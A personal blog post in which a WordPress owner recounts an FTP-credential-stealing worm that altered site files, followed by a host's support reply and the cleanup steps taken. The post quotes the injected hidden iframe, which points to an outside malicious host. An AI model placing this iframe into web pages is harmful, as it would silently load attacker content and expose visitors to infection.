Completely Remove Malware from Your Computer – Malware / Worm that steals FTP login information

This week I got error on almost of my Wordpress blogs, this error occurred twice in the past 5 days. It really made me worried and giddy, because there’s just a blank page with error message like this:

Warning : Unexpected character in input: ''' (ASCII=39) state=1 in ….
Parse error : syntax error, unexpected '.' in ….

After I checked my files, there’s code added at the bottom line of my files, iframe code like this:

<iframe src="http://c9u.at:8080/ts/in.cgi?pepsi147" width=125 height=125 style="visibility: hidden"></iframe>

This line tells me that I have been hacked, infected by virus / worm.

This is a malware / worm that steals my FTP login information from my FTP programs and modifies lots of php / html / htm pages on all of the sites it can access. In FTP log file, there’re lots of entries showing someone downloading the file and then re-uploading it again. It appears destructively to modify the files overwriting whatever text was there.

Here’s a list of some sources that I found according to this issue:

http://wordpress.org/support/topic/268083
http://wordpress.org/support/topic/272140
http://wordpress.org/support/topic/272379
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

First time I face this virus, what I did is re-upload those infected files and rename my FTP password. I think I just resolved this problem and it will not happen again. But I was wrong, today I get this error again.

So I really know now, I need to take serious action to completely remove the worm / malware. I have to ensure my computer completely clean and it doesn’t happen again.

Referring to the Hostgator Security Support, in order to protect against future attack, I need to run full virus and malware scans on my computer to ensure that they are clean.

Hello,

It appears that malicious code has been uploaded to your account via FTP using a compromised username and password. At this time, I have removed the malicious code from the account.

From our experience with malware of this nature, the user account passwords are compromised though viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware. It is highly suggested that you also do the following:

* Any computers legitimately allowed to access the account must be updated fully (Windows updates, browser updates, application updates, anti-virus updates)

* Any computers legitimately allowed to access the account must be completely scanned for viruses and secured completely

Despite now I’m not sure that my computer completely clean, but I just have been doing some action to protect my computer:

1. Update my FTP password
2. Update my FPT software to the newest version
3. Of course, re-upload infected files dan upgrade my Wordpress blog to the latest version
4. Scan my whole computer using Malware Bytes from www.malwarebytes.org

Only that I can do now, I hope this error doesn’t happen again and the worm is completely removed.

• OIOpublisher Coupon Code – $8 Discount
• Free Wordpress theme: Hijau Kalem
• Some wordpress errors and how to fix them
• Wordpress plugin: Link Cloaking Plugin
• Nowadays, what is blogging?!
• One-Theme: all in one Wordpress theme that you need
• Tips for making a web 2.0 blog post
• OIOPublisher coupon code